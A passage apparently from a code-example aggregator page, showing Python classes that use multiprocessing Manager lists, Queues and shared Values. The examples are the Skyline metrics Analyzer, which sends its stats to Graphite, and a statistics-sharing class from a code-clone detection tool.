        self.comms_flush_rxtx_queues()
        self.comms_close()
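
A minimal sketch, assuming only the standard library, of the shared drive LIFO idea used above: a Manager().list() proxy is handed to a child process (standing in for CommProcess) so both sides see the same command list. The worker function and command strings here are illustrative only.

from multiprocessing import Manager, Process


def comms_worker(tx_lifo):
    # Stand-in for a comms process: drain the shared LIFO, most recent command first
    while len(tx_lifo) > 0:
        print('sending %s' % tx_lifo.pop())


if __name__ == '__main__':
    drive_lifo = Manager().list()    # shared list proxy, as in init_multiprocessing
    drive_lifo.append('DG8')         # north
    drive_lifo.append('DG5')         # stop
    p = Process(target=comms_worker, args=(drive_lifo,))
    p.start()
    p.join()
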
Example No. 42
0
class Analyzer(Thread):
    """
    The Analyzer class which controls the analyzer thread and spawned processes.
    """

    def __init__(self, parent_pid):
        """
        Initialize the Analyzer

        Create the :obj:`self.anomalous_metrics` list

        Create the :obj:`self.exceptions_q` queue

        Create the :obj:`self.anomaly_breakdown_q` queue

        """
        super(Analyzer, self).__init__()
        self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.anomalous_metrics = Manager().list()
        self.exceptions_q = Queue()
        self.anomaly_breakdown_q = Queue()
        self.mirage_metrics = Manager().list()

    def check_if_parent_is_alive(self):
        """
        Self explanatory
        """
        try:
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except:
            exit(0)

    def send_graphite_metric(self, name, value):
        """
        Sends the skyline_app metrics to the `GRAPHITE_HOST` if a graphite
        host is defined.
        """
        if settings.GRAPHITE_HOST != '':

            skyline_app_metric = skyline_app_graphite_namespace + name

            sock = socket.socket()
            sock.settimeout(10)

            # Handle connection error to Graphite #116 @etsy
            # Fixed as per https://github.com/etsy/skyline/pull/116 and
            # mlowicki:etsy_handle_connection_error_to_graphite
            # Handle connection error to Graphite #7 @ earthgecko
            # merged 1 commit into earthgecko:master from
            # mlowicki:handle_connection_error_to_graphite on 16 Mar 2015
            try:
                sock.connect((settings.GRAPHITE_HOST, settings.CARBON_PORT))
                sock.settimeout(None)
            except socket.error:
                sock.settimeout(None)
                endpoint = '%s:%d' % (settings.GRAPHITE_HOST,
                                      settings.CARBON_PORT)
                logger.error("Can't connect to Graphite at %s" % endpoint)
                return False

            # For the same reason as above
            # sock.sendall('%s %s %i\n' % (name, value, time()))
            try:
                sock.sendall('%s %s %i\n' % (skyline_app_metric, value, time()))
                sock.close()
                return True
            except:
                endpoint = '%s:%d' % (settings.GRAPHITE_HOST,
                                      settings.CARBON_PORT)
                logger.error("Can't connect to Graphite at %s" % endpoint)
                return False

        return False

    def spin_process(self, i, unique_metrics):
        """
        Assign a bunch of metrics for a process to analyze.

        Multi get the assigned_metrics for the process from Redis.

        For each metric:\n
        * unpack the `raw_timeseries` for the metric.\n
        * Analyse each timeseries against `ALGORITHMS` to determine if it is\n
          anomalous.\n
        * If anomalous add it to the :obj:`self.anomalous_metrics` list\n
        * Add what algorithms triggered to the :obj:`self.anomaly_breakdown_q` queue\n

        Add keys and values to the queue so the parent process can collate for:\n
        * :py:obj:`self.anomaly_breakdown_q`
        * :py:obj:`self.exceptions_q`
        """

        spin_start = time()
        logger.info('spin_process started')

        # Discover assigned metrics
        keys_per_processor = int(ceil(float(len(unique_metrics)) / float(settings.ANALYZER_PROCESSES)))
        if i == settings.ANALYZER_PROCESSES:
            assigned_max = len(unique_metrics)
        else:
            assigned_max = min(len(unique_metrics), i * keys_per_processor)
        # Fix analyzer worker metric assignment #94
        # https://github.com/etsy/skyline/pull/94 @languitar:worker-fix
        assigned_min = (i - 1) * keys_per_processor
        assigned_keys = range(assigned_min, assigned_max)
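        # e.g. with 1000 unique_metrics and ANALYZER_PROCESSES = 4, each worker
        # is assigned ceil(1000 / 4) = 250 keys, so worker i=2 gets indices
        # 250-499 and the last worker picks up any remainder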
        # assigned_keys = range(300, 310)

        # Compile assigned metrics
        assigned_metrics = [unique_metrics[index] for index in assigned_keys]

        # Check if this process is unnecessary
        if len(assigned_metrics) == 0:
            return

        # Multi get series
        raw_assigned = self.redis_conn.mget(assigned_metrics)

        # Make process-specific dicts
        exceptions = defaultdict(int)
        anomaly_breakdown = defaultdict(int)

        # Distill timeseries strings into lists
        for i, metric_name in enumerate(assigned_metrics):
            self.check_if_parent_is_alive()

            # logger.info('analysing %s' % metric_name)

            try:
                raw_series = raw_assigned[i]
                unpacker = Unpacker(use_list=False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)

                anomalous, ensemble, datapoint = run_selected_algorithm(timeseries, metric_name)

                # If it's anomalous, add it to list
                if anomalous:
                    base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
                    metric = [datapoint, base_name]
                    self.anomalous_metrics.append(metric)

                    # Get the anomaly breakdown - who returned True?
                    triggered_algorithms = []
                    for index, value in enumerate(ensemble):
                        if value:
                            algorithm = settings.ALGORITHMS[index]
                            anomaly_breakdown[algorithm] += 1
                            triggered_algorithms.append(algorithm)

            # It could have been deleted by the Roomba
            except TypeError:
                # logger.error('TypeError analysing %s' % metric_name)
                exceptions['DeletedByRoomba'] += 1
            except TooShort:
                # logger.error('TooShort analysing %s' % metric_name)
                exceptions['TooShort'] += 1
            except Stale:
                # logger.error('Stale analysing %s' % metric_name)
                exceptions['Stale'] += 1
            except Boring:
                # logger.error('Boring analysing %s' % metric_name)
                exceptions['Boring'] += 1
            except:
                # logger.error('Other analysing %s' % metric_name)
                exceptions['Other'] += 1
                logger.info(traceback.format_exc())

        # Add values to the queue so the parent process can collate
        for key, value in anomaly_breakdown.items():
            self.anomaly_breakdown_q.put((key, value))

        for key, value in exceptions.items():
            self.exceptions_q.put((key, value))

        spin_end = time() - spin_start
        logger.info('spin_process took %.2f seconds' % spin_end)

    def run(self):
        """
        Called when the process initializes.

        Determine if Redis is up and discover the number of `unique metrics`.

        Divide the `unique_metrics` between the number of `ANALYZER_PROCESSES`
        and assign each process a set of metrics to analyse for anomalies.

        Wait for the processes to finish.

        Determine whether any anomalous metrics require:\n
        * alerting on (and set `EXPIRATION_TIME` key in Redis for alert).\n
        * feeding to another module e.g. mirage.

        Populate the webapp json with the anomalous_metrics details.

        Log the details about the run to the skyline log.

        Send skyline.analyzer metrics to `GRAPHITE_HOST`.
        """

        # Log management to prevent overwriting
        # Allow the bin/<skyline_app>.d to manage the log
        if os.path.isfile(skyline_app_logwait):
            try:
                os.remove(skyline_app_logwait)
            except OSError:
                logger.error('error - failed to remove %s, continuing' % skyline_app_logwait)
                pass

        now = time()
        log_wait_for = now + 5
        while now < log_wait_for:
            if os.path.isfile(skyline_app_loglock):
                sleep(.1)
                now = time()
            else:
                now = log_wait_for + 1

        logger.info('starting %s run' % skyline_app)
        if os.path.isfile(skyline_app_loglock):
            logger.error('error - bin/%s.d log management seems to have failed, continuing' % skyline_app)
            try:
                os.remove(skyline_app_loglock)
                logger.info('log lock file removed')
            except OSError:
                logger.error('error - failed to remove %s, continuing' % skyline_app_loglock)
                pass
        else:
            logger.info('bin/%s.d log management done' % skyline_app)

        if not os.path.exists(settings.SKYLINE_TMP_DIR):
            if python_version == 2:
                os.makedirs(settings.SKYLINE_TMP_DIR, 0o750)
            if python_version == 3:
                os.makedirs(settings.SKYLINE_TMP_DIR, mode=0o750)

        # Initiate the algorithm timings if Analyzer is configured to send the
        # algorithm_breakdown metrics with ENABLE_ALGORITHM_RUN_METRICS
        algorithm_tmp_file_prefix = settings.SKYLINE_TMP_DIR + '/' + skyline_app + '.'
        algorithms_to_time = []
        if send_algorithm_run_metrics:
            algorithms_to_time = settings.ALGORITHMS

        while 1:
            now = time()

            # Make sure Redis is up
            try:
                self.redis_conn.ping()
            except:
                logger.error('skyline can\'t connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
                sleep(10)
                self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
                continue

            # Report app up
            self.redis_conn.setex(skyline_app, 120, now)

            # Discover unique metrics
            unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))

            if len(unique_metrics) == 0:
                logger.info('no metrics in redis. try adding some - see README')
                sleep(10)
                continue

            # Using count files rather than multiprocessing.Value to enable
            # metrics for algorithm run times, etc
            for algorithm in algorithms_to_time:
                algorithm_count_file = algorithm_tmp_file_prefix + algorithm + '.count'
                algorithm_timings_file = algorithm_tmp_file_prefix + algorithm + '.timings'
                # with open(algorithm_count_file, 'a') as f:
                with open(algorithm_count_file, 'w') as f:
                    pass
                with open(algorithm_timings_file, 'w') as f:
                    pass

            # Spawn processes
            pids = []
            pid_count = 0
            for i in range(1, settings.ANALYZER_PROCESSES + 1):
                if i > len(unique_metrics):
                    logger.info('WARNING: skyline is set for more cores than needed.')
                    break

                p = Process(target=self.spin_process, args=(i, unique_metrics))
                pids.append(p)
                pid_count += 1
                logger.info('starting %s of %s spin_process/es' % (str(pid_count), str(settings.ANALYZER_PROCESSES)))
                p.start()

            # Send wait signal to zombie processes
            # for p in pids:
            #     p.join()
            # Self monitor processes and terminate if any spin_process has run
            # for longer than 180 seconds
            p_starts = time()
            while time() - p_starts <= 180:
                if any(p.is_alive() for p in pids):
                    # Just to avoid hogging the CPU
                    sleep(.1)
                else:
                    # All the processes are done, break now.
                    time_to_run = time() - p_starts
                    logger.info('%s :: %s spin_process/es completed in %.2f seconds' % (skyline_app, str(settings.ANALYZER_PROCESSES), time_to_run))
                    break
            else:
                # We only enter this if we didn't 'break' above.
                logger.info('%s :: timed out, killing all spin_process processes' % (skyline_app))
                for p in pids:
                    p.terminate()
                    p.join()

            # Grab data from the queue and populate dictionaries
            exceptions = dict()
            anomaly_breakdown = dict()
            while 1:
                try:
                    key, value = self.anomaly_breakdown_q.get_nowait()
                    if key not in anomaly_breakdown.keys():
                        anomaly_breakdown[key] = value
                    else:
                        anomaly_breakdown[key] += value
                except Empty:
                    break

            while 1:
                try:
                    key, value = self.exceptions_q.get_nowait()
                    if key not in exceptions.keys():
                        exceptions[key] = value
                    else:
                        exceptions[key] += value
                except Empty:
                    break

            # Push to panorama
#            if len(self.panorama_anomalous_metrics) > 0:
#                logger.info('to do - push to panorama')

            # Push to crucible
#            if len(self.crucible_anomalous_metrics) > 0:
#                logger.info('to do - push to crucible')

            # Write anomalous_metrics to static webapp directory

            # Using count files rather than multiprocessing.Value to enable
            # metrics for algorithm run times, etc
            for algorithm in algorithms_to_time:
                algorithm_count_file = algorithm_tmp_file_prefix + algorithm + '.count'
                algorithm_timings_file = algorithm_tmp_file_prefix + algorithm + '.timings'

                try:
                    algorithm_count_array = []
                    with open(algorithm_count_file, 'r') as f:
                        for line in f:
                            value_string = line.replace('\n', '')
                            unquoted_value_string = value_string.replace("'", '')
                            float_value = float(unquoted_value_string)
                            algorithm_count_array.append(float_value)
                except:
                    algorithm_count_array = False

                if not algorithm_count_array:
                    continue

                number_of_times_algorithm_run = len(algorithm_count_array)
                logger.info(
                    'algorithm run count - %s run %s times' % (
                        algorithm, str(number_of_times_algorithm_run)))
                if number_of_times_algorithm_run == 0:
                    continue

                try:
                    algorithm_timings_array = []
                    with open(algorithm_timings_file, 'r') as f:
                        for line in f:
                            value_string = line.replace('\n', '')
                            unquoted_value_string = value_string.replace("'", '')
                            float_value = float(unquoted_value_string)
                            algorithm_timings_array.append(float_value)
                except:
                    algorithm_timings_array = False

                if not algorithm_timings_array:
                    continue

                number_of_algorithm_timings = len(algorithm_timings_array)
                logger.info(
                    'algorithm timings count - %s has %s timings' % (
                        algorithm, str(number_of_algorithm_timings)))

                if number_of_algorithm_timings == 0:
                    continue

                try:
                    _sum_of_algorithm_timings = sum(algorithm_timings_array)
                except:
                    logger.error("sum error: " + traceback.format_exc())
                    _sum_of_algorithm_timings = round(0.0, 6)
                    logger.error('error - sum_of_algorithm_timings - %s' % (algorithm))
                    continue

                sum_of_algorithm_timings = round(_sum_of_algorithm_timings, 6)
                # logger.info('sum_of_algorithm_timings - %s - %.16f seconds' % (algorithm, sum_of_algorithm_timings))

                try:
                    _median_algorithm_timing = determine_median(algorithm_timings_array)
                except:
                    _median_algorithm_timing = round(0.0, 6)
                    logger.error('error - _median_algorithm_timing - %s' % (algorithm))
                    continue
                median_algorithm_timing = round(_median_algorithm_timing, 6)
                # logger.info('median_algorithm_timing - %s - %.16f seconds' % (algorithm, median_algorithm_timing))

                logger.info(
                    'algorithm timing - %s - total: %.6f - median: %.6f' % (
                        algorithm, sum_of_algorithm_timings,
                        median_algorithm_timing))
                send_metric_name = 'algorithm_breakdown.' + algorithm + '.timing.times_run'
                self.send_graphite_metric(send_metric_name, '%d' % number_of_algorithm_timings)
                send_metric_name = 'algorithm_breakdown.' + algorithm + '.timing.total_time'
                self.send_graphite_metric(send_metric_name, '%.6f' % sum_of_algorithm_timings)
                send_metric_name = 'algorithm_breakdown.' + algorithm + '.timing.median_time'
                self.send_graphite_metric(send_metric_name, '%.6f' % median_algorithm_timing)

            # Log progress
            logger.info('seconds to run    :: %.2f' % (time() - now))
            logger.info('total metrics     :: %d' % len(unique_metrics))
            logger.info('total analyzed    :: %d' % (len(unique_metrics) - sum(exceptions.values())))
            logger.info('total anomalies   :: %d' % len(self.anomalous_metrics))
            logger.info('exception stats   :: %s' % exceptions)
            logger.info('anomaly breakdown :: %s' % anomaly_breakdown)

            # Log to Graphite
            self.send_graphite_metric('run_time', '%.2f' % (time() - now))
            self.send_graphite_metric('total_analyzed', '%.2f' % (len(unique_metrics) - sum(exceptions.values())))
            self.send_graphite_metric('total_anomalies', '%d' % len(self.anomalous_metrics))
            self.send_graphite_metric('total_metrics', '%d' % len(unique_metrics))
            for key, value in exceptions.items():
                send_metric = 'exceptions.%s' % key
                self.send_graphite_metric(send_metric, '%d' % value)
            for key, value in anomaly_breakdown.items():
                send_metric = 'anomaly_breakdown.%s' % key
                self.send_graphite_metric(send_metric, '%d' % value)

            # Check canary metric
            raw_series = self.redis_conn.get(settings.FULL_NAMESPACE + settings.CANARY_METRIC)
            if raw_series is not None:
                unpacker = Unpacker(use_list=False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)
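                # time_human is the span of the canary timeseries in hours;
                # projected estimates how many seconds a full 24 hours of data
                # would take to analyze at this run's observed rate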
                time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600
                projected = 24 * (time() - now) / time_human

                logger.info('canary duration   :: %.2f' % time_human)
                self.send_graphite_metric('duration', '%.2f' % time_human)
                self.send_graphite_metric('projected', '%.2f' % projected)

            # Reset counters
            self.anomalous_metrics[:] = []

            # Sleep if it went too fast
            # if time() - now < 5:
            #    logger.info('sleeping due to low run time...')
            #    sleep(10)
            # @modified 20160504 - @earthgecko - development internal ref #1338, #1340)
            # Etsy's original logic slept only if the run took less than 5
            # seconds, which does not make skyline Analyzer very efficient in
            # installations where 100s of 1000s of metrics are being analyzed.
            # It led to Analyzer running over the same metrics multiple times
            # in a minute and always working, e.g. analysing a few 1000 metrics
            # in 9 seconds and then doing it again and again within a single
            # minute.  The ANALYZER_OPTIMUM_RUN_DURATION setting was therefore
            # added to allow this to self optimise in cases where skyline is
            # NOT deployed to analyze 100s of 1000s of metrics.  This relates
            # to optimising performance for any deployments in the few 1000s
            # of metrics and 60 second resolution area, e.g. smaller and local
            # deployments.
            process_runtime = time() - now
            analyzer_optimum_run_duration = settings.ANALYZER_OPTIMUM_RUN_DURATION
            if process_runtime < analyzer_optimum_run_duration:
                sleep_for = (analyzer_optimum_run_duration - process_runtime)
                # sleep_for = 60
                logger.info('sleeping for %.2f seconds due to low run time...' % sleep_for)
                sleep(sleep_for)
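
A minimal sketch, using only the standard library, of the queue collation pattern the Analyzer above relies on: each spin_process puts (key, count) tuples on a multiprocessing Queue and the parent drains it with get_nowait() until Empty, summing the counts per key. The algorithm names below are hypothetical.

from collections import defaultdict
from multiprocessing import Process, Queue
from queue import Empty   # the Queue module in Python 2


def spin_process(anomaly_breakdown_q):
    # Hypothetical per-process breakdown of which algorithms triggered
    anomaly_breakdown = defaultdict(int)
    anomaly_breakdown['histogram_bins'] += 2
    anomaly_breakdown['mean_subtraction_cumulation'] += 1
    for key, value in anomaly_breakdown.items():
        anomaly_breakdown_q.put((key, value))


if __name__ == '__main__':
    anomaly_breakdown_q = Queue()
    pids = [Process(target=spin_process, args=(anomaly_breakdown_q,)) for _ in range(2)]
    for p in pids:
        p.start()
    for p in pids:
        p.join()

    # Grab data from the queue and collate, as the parent run() does
    anomaly_breakdown = {}
    while True:
        try:
            key, value = anomaly_breakdown_q.get_nowait()
            anomaly_breakdown[key] = anomaly_breakdown.get(key, 0) + value
        except Empty:
            break
    print(anomaly_breakdown)
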
Example No. 43
0
class SharedData(object):
    """
    Handles shared statistical data, which we want to collect over several
    executions of the ccdetection tool.
    Only shared values are used, so that multiple child processes 
    can manipulate them.
    """

    KEY_NODES   = "nodes_total"
    KEY_INPATH  = "in_path"
    KEY_CLONES  = "clones"
    KEY_COUNTER = "counter"
    KEY_QUERY_TIME = "query_time_total"
    KEY_FIRST_COUNTER = "first_query_counter"
    KEY_PROJECTS_COUNTER = "projects_counter"
    KEY_FIRST_QUERY_TIME = "first_query_time_total"

    def __init__(self, path, lock, in_path=None):
        """
        Setup all values to be shared (between processes) values.
        """
        self.lock = lock
        self.path = path
        
        if os.path.isfile(path):
            self.loadData()
            
        else:
            self.in_path = in_path
            self.clones = Manager().list()
            self.counter = Value("i", 0)
            self.nodes_total = Value("i", 0)            
            self.first_counter = Value("i", 0)
            self.query_time_total = Value("d", 0)
            self.projects_counter = Value("i", 0)
            self.first_query_time_total = Value("d", 0)
    
    def incProjectsCounter(self):
        """
        Increase the counter of projects analysed.
        """
        self.projects_counter.value += 1
    
    def addQuery(self, query_time, first=False):
        """
        Add the statistical data of a query that did not find a code clone.
        """
        if first:
            self.first_counter.value += 1
            self.first_query_time_total.value += query_time
             
        else:
            self.counter.value += 1
            self.query_time_total.value += query_time
            
    def addFoundCodeClone(self, code_clone_data, first=False):
        """
        Add the statistical data of a query that did find a code clone.
        """
        self.addQuery(code_clone_data.getQueryTime(), first)
        self.clones.append(code_clone_data)
        
    def loadData(self):
        with open(self.path, "rb") as fh:
            data = pickle.load(fh)
            
        # Restore state from load data.
        self.in_path = data[self.KEY_INPATH]
        self.clones  = Manager().list(data[self.KEY_CLONES])
        self.counter = Value("i", data[self.KEY_COUNTER])
        self.nodes_total = Value("i", data[self.KEY_NODES])
        self.first_counter = Value("i", data[self.KEY_FIRST_COUNTER])
        self.query_time_total = Value("d", data[self.KEY_QUERY_TIME])
        self.projects_counter = Value("i", data[self.KEY_PROJECTS_COUNTER])
        self.first_query_time_total = Value("d", data[self.KEY_FIRST_QUERY_TIME])
            
    def saveData(self, queries, code_clones):
        """
        Save the data of an analysed project to file.
        To avoid conflicts when multiple processes add and save data at the
        same time, all data is added and saved under a lock, which prevents
        concurrent executions.
        """
        self.lock.acquire()
        # Increase projects counter.
        self.incProjectsCounter()    
        
        
        # Add all query data.
        for query_dict in queries:
            self.addQuery(query_dict["query_time"], query_dict["first"])

        # Add all data from found code clones
        for clone_dict in code_clones:
            self.addFoundCodeClone(clone_dict["clone"], clone_dict["first"])
        
        self.saveToFile(self.path)
        
        self.lock.release()

    def __str__(self):
        try:
            avg_query_time_nofirst = (self.query_time_total.value/
                                      float(self.counter.value))
        except:
            avg_query_time_nofirst = 0
            
        try:
            avg_query_time = (
                    (self.query_time_total.value + self.first_query_time_total.value)/
                    float(self.counter.value + self.first_counter.value)
                    )
            
        except:
            avg_query_time = 0

        try:
            avg_first_query_time = (self.first_query_time_total.value/
                                    float(self.first_counter.value))
        except:
            avg_first_query_time = 0 
                    
        try:
            avg_nodes = self.nodes_total.value/float(self.counter.value)
        except:
            avg_nodes = 0
        
        data = (
            "Projects analysed: %d\n"
            "Total queries executed: %d\n"
            "Average query time: %fs\n"
            "Average query time (without first query): %fs\n"
            "Average query time (first query only): %fs\n"
            "Average number of nodes in AST: %f\n"
            "Code clones found: %d"
            ) % (
                self.projects_counter.value,
                self.counter.value + self.first_counter.value, avg_query_time,
                avg_query_time_nofirst,
                avg_first_query_time,
                avg_nodes, len(self.clones)
                )
            
        return data
    
    def combineWith(self, shared_data):
        self.lock.acquire() 
        
        # Add the data of shared_data to this file.
        self.in_path = shared_data.in_path
        self.nodes_total.value += shared_data.nodes_total.value
        
        for clone in shared_data.clones:
            self.clones.append(clone)
            
        self.counter.value += shared_data.counter.value
        self.query_time_total.value += shared_data.query_time_total.value 
        self.first_counter.value += shared_data.first_counter.value
        self.projects_counter.value += shared_data.projects_counter.value
        self.first_query_time_total.value += (
                                    shared_data.first_query_time_total.value
                                    )
        
        self.lock.release()
        
    def saveToFile(self, out_file):
        # Transform data to dictionary for easy pickling.
        data = {}
        data[self.KEY_INPATH] = self.in_path
        data[self.KEY_NODES]  = self.nodes_total.value
        data[self.KEY_CLONES] = []
        for clone in self.clones:
            data[self.KEY_CLONES].append(clone)
        data[self.KEY_COUNTER] = self.counter.value
        data[self.KEY_QUERY_TIME] = self.query_time_total.value 
        data[self.KEY_FIRST_COUNTER] = self.first_counter.value
        data[self.KEY_PROJECTS_COUNTER] = self.projects_counter.value
        data[self.KEY_FIRST_QUERY_TIME] = self.first_query_time_total.value
        
        # Save data to file.
        with open(out_file, "wb") as fh:
            pickle.dump(data, fh, pickle.HIGHEST_PROTOCOL)
    
    def getClones(self):
        clones = []
        for clone in self.clones:
            clones.append(clone)
            
        return clones
    
    def getProjectsCount(self):
        return self.projects_counter.value

    def getInPath(self):
        return self.in_path
    
    def setInPath(self, path):
        self.in_path = path
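
A minimal sketch, assuming only the standard library, of the shared-value approach SharedData is built on: multiprocessing Value objects and a Manager().list() let several worker processes accumulate statistics that the parent reads afterwards, with a Lock serialising related updates. All names and figures here are illustrative.

from multiprocessing import Lock, Manager, Process, Value


def analyse_project(lock, counter, query_time_total, clones, query_time):
    # Record one hypothetical query; the lock keeps the two updates together
    with lock:
        counter.value += 1
        query_time_total.value += query_time
    clones.append({'query_time': query_time})


if __name__ == '__main__':
    lock = Lock()
    counter = Value('i', 0)              # queries executed
    query_time_total = Value('d', 0.0)   # total query time in seconds
    clones = Manager().list()            # found clones, shared between processes

    procs = [Process(target=analyse_project,
                     args=(lock, counter, query_time_total, clones, t))
             for t in (0.4, 1.1, 0.7)]
    for p in procs:
        p.start()
    for p in procs:
        p.join()

    print(counter.value, round(query_time_total.value, 2), len(clones))
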
Example No. 44
0
class Analyzer(Thread):
    def __init__(self, parent_pid):
        """
        Initialize the Analyzer
        """
        super(Analyzer, self).__init__()
        self.ring = RedisRing(settings.REDIS_BACKENDS)
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.anomalous_metrics = Manager().list()
        self.exceptions_q = Queue()
        self.anomaly_breakdown_q = Queue()

    def check_if_parent_is_alive(self):
        """
        Self explanatory
        """
        try:
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except:
            exit(0)

    def spin_process(self, i, unique_metrics):
        """
        Assign a bunch of metrics for a process to analyze.
        """
        process_key = '.'.join(['skyline', 'analyzer', socket.gethostname(), str(i)])
        alive_key = '.'.join([process_key, 'alive'])
        self.ring.run('set', alive_key, 1)
        self.ring.run('expire', alive_key, 30)
        processes = list(self.ring.run('zrange', settings.ANALYZER_PROCESS_KEY, 0, -1))
        for key in processes:
            value = self.ring.run('get', key)
            if not value:
                self.ring.run('zrem', settings.ANALYZER_PROCESS_KEY, 0, key)

        # Add current process to index and determine position
        if not self.ring.run('zscore', settings.ANALYZER_PROCESS_KEY, alive_key):
            self.ring.run('zadd', settings.ANALYZER_PROCESS_KEY, time(), alive_key)
        self.ring.run('expire', settings.ANALYZER_PROCESS_KEY, 60)
        process_position = self.ring.run('zrank', settings.ANALYZER_PROCESS_KEY, alive_key) + 1
        process_count = self.ring.run('zcard', settings.ANALYZER_PROCESS_KEY)

        # If there are fewer processes than we expect to be running, assume
        # the others will start
        if process_count < settings.ANALYZER_PROCESSES:
            process_count = settings.ANALYZER_PROCESSES

        # Discover assigned metrics
        keys_per_processor = int(ceil(float(len(unique_metrics)) / float(process_count)))
        if process_position == process_count:
            assigned_max = len(unique_metrics)
        else:
            assigned_max = process_position * keys_per_processor
        assigned_min = assigned_max - keys_per_processor
        assigned_keys = range(assigned_min, assigned_max)

        # Compile assigned metrics
        assigned_metrics = [unique_metrics[index] for index in assigned_keys]

        # Check if this process is unnecessary
        if len(assigned_metrics) == 0:
            return

        # Multi get series
        raw_assigned = self.ring.run('mget', assigned_metrics)

        # Make process-specific dicts
        exceptions = defaultdict(int)
        anomaly_breakdown = defaultdict(int)

        # Distill timeseries strings into lists
        for i, metric_name in enumerate(assigned_metrics):
            self.check_if_parent_is_alive()

            try:
                raw_series = raw_assigned[i]
                unpacker = Unpacker(use_list = False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)

                anomalous, ensemble, datapoint = run_selected_algorithm(timeseries, metric_name)

                # If it's anomalous, add it to list
                if anomalous:
                    base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
                    metric = [datapoint, base_name]
                    self.anomalous_metrics.append(metric)

                    # Get the anomaly breakdown - who returned True?
                    for index, value in enumerate(ensemble):
                        if value:
                            algorithm = settings.ALGORITHMS[index]
                            anomaly_breakdown[algorithm] += 1

            # It could have been deleted by the Roomba
            except TypeError:
                exceptions['DeletedByRoomba'] += 1
            except TooShort:
                exceptions['TooShort'] += 1
            except Stale:
                exceptions['Stale'] += 1
            except Incomplete:
                exceptions['Incomplete'] += 1
            except Boring:
                exceptions['Boring'] += 1
            except:
                exceptions['Other'] += 1
                logger.info(traceback.format_exc())

        # If anomalies were detected, pack and write the anomaly data to Redis
        if len(self.anomalous_metrics) > 0:
            packed = Packer().pack(list(self.anomalous_metrics))
            self.ring.run('set', process_key, packed)
            # expire the key in 30s so anomalies don't show up for too long
            self.ring.run('expire', process_key, 30)
            self.ring.run('sadd', settings.ANALYZER_ANOMALY_KEY, process_key)
            # expire the key in 60s so anomalies don't show up for too long
            self.ring.run('expire', settings.ANALYZER_ANOMALY_KEY, 60)

        # Collate this process's anomaly breakdown back to the parent via the queue
        for key, value in anomaly_breakdown.items():
            self.anomaly_breakdown_q.put((key, value))

        for key, value in exceptions.items():
            self.exceptions_q.put((key, value))

    def run(self):
        """
        Called when the process initializes.
        """
        while 1:
            now = time()
            # Make sure Redis is up
            try:
                self.ring.check_connections()
            except:
                sleep(10)
                self.ring = RedisRing(settings.REDIS_BACKENDS)
                continue

            # Discover unique metrics
            unique_metrics = list(self.ring.run('smembers', settings.FULL_NAMESPACE + 'unique_metrics'))

            if len(unique_metrics) == 0:
                logger.info('no metrics in redis. try adding some - see README')
                sleep(10)
                continue

            # Spawn processes
            pids = []
            for i in range(1, settings.ANALYZER_PROCESSES + 1):
                if i > len(unique_metrics):
                    logger.info('WARNING: skyline is set for more cores than needed.')
                    break

                p = Process(target=self.spin_process, args=(i, unique_metrics))
                pids.append(p)
                p.start()

            # Send wait signal to zombie processes
            for p in pids:
                p.join()

            # Grab data from the queue and populate dictionaries
            exceptions = dict()
            anomaly_breakdown = dict()
            while 1:
                try:
                    key, value = self.anomaly_breakdown_q.get_nowait()
                    if key not in anomaly_breakdown.keys():
                        anomaly_breakdown[key] = value
                    else:
                        anomaly_breakdown[key] += value
                except Empty:
                    break

            while 1:
                try:
                    key, value = self.exceptions_q.get_nowait()
                    if key not in exceptions.keys():
                        exceptions[key] = value
                    else:
                        exceptions[key] += value
                except Empty:
                    break

            # Send alerts
            if settings.ENABLE_ALERTS:
                for alert in settings.ALERTS:
                    for metric in self.anomalous_metrics:
                        if alert[0] in metric[1]:
                            cache_key = 'last_alert.%s.%s' % (alert[1], metric[1])
                            try:
                                last_alert = self.ring.run('get', cache_key)
                                if not last_alert:
                                    self.ring.run('setex', cache_key, alert[2], packb(metric[0]))
                                    trigger_alert(alert, metric)

                            except Exception as e:
                                logger.error("couldn't send alert: %s" % e)

            # Log progress
            logger.info('seconds to run    :: %.2f' % (time() - now))
            logger.info('total metrics     :: %d' % len(unique_metrics))
            logger.info('total analyzed    :: %d' % (len(unique_metrics) - sum(exceptions.values())))
            logger.info('total anomalies   :: %d' % len(self.anomalous_metrics))
            logger.info('exception stats   :: %s' % exceptions)
            logger.info('anomaly breakdown :: %s' % anomaly_breakdown)

            # Log to Graphite
            if settings.GRAPHITE_HOST != '':
                host = settings.GRAPHITE_HOST.replace('http://', '')
                system('echo skyline.analyzer.run_time %.2f %s | nc -w 3 %s 2003' % ((time() - now), now, host))
                system('echo skyline.analyzer.total_analyzed %d %s | nc -w 3 %s 2003' % ((len(unique_metrics) - sum(exceptions.values())), now, host))

            # Check canary metric
            raw_series = self.ring.run('get', settings.FULL_NAMESPACE + settings.CANARY_METRIC)
            if raw_series is not None:
                unpacker = Unpacker(use_list = False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)
                time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600
                projected = 24 * (time() - now) / time_human

                logger.info('canary duration   :: %.2f' % time_human)
                if settings.GRAPHITE_HOST != '':
                    host = settings.GRAPHITE_HOST.replace('http://', '')
                    system('echo skyline.analyzer.duration %.2f %s | nc -w 3 %s 2003' % (time_human, now, host))
                    system('echo skyline.analyzer.projected %.2f %s | nc -w 3 %s 2003' % (projected, now, host))

            # Reset counters
            self.anomalous_metrics[:] = []

            # Sleep if it went too fast
            if time() - now < 5:
                logger.info('sleeping due to low run time...')
                sleep(10)
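Example No. 44 hands results back from spin_process() to run() through two multiprocessing Queues and drains them with get_nowait() until Empty. Below is a stripped-down sketch of that collection pattern; worker() and the sample data are illustrative only.

from collections import defaultdict
from multiprocessing import Process, Queue
from queue import Empty   # Queue.Empty on Python 2
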